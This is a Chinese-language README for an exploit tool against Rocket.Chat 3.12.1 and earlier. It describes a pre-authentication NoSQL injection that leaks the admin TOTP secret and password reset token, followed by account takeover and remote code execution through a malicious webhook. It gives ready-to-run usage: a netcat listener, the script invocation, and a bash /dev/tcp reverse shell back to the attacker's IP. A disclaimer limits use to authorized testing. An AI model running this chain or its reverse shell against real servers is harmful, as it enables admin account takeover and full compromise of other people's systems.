
Rocket.Chat 3.12.1 的漏洞利用,通过预认证 NoSQL 注入实现 RCE,泄露管理员 TOTP 密钥和密码重置令牌,进而通过恶意 webhook 集成实现远程代码执行。
利用 Rocket.Chat 3.12.1 中的预认证 NoSQL 注入漏洞,泄露管理员的 TOTP 密钥和密码重置令牌,接管管理员账户,并通过恶意 webhook 集成实现 RCE。
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
运行漏洞利用脚本之前,请在另一个终端中启动 netcat 监听器,以接收传入的反弹 shell:
nc -lvnp 4444
保持此终端打开。漏洞利用成功运行后,你的 shell 将出现在此处。
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
本工具仅用于教育目的和经授权的渗透测试。作者不对因使用本工具而造成的任何滥用或损害负责。测试前请务必获得正式的书面授权。
| 参数 | 说明 |
|---|
-t | 目标 Rocket.Chat URL |
-u | 你注册的低权限用户名 |
-p | 你注册的低权限密码 |
-e | 管理员邮箱地址 |
-a | 管理员用户名 |
-c | 反弹 shell 命令 |
-v | 详细模式(显示原始响应) |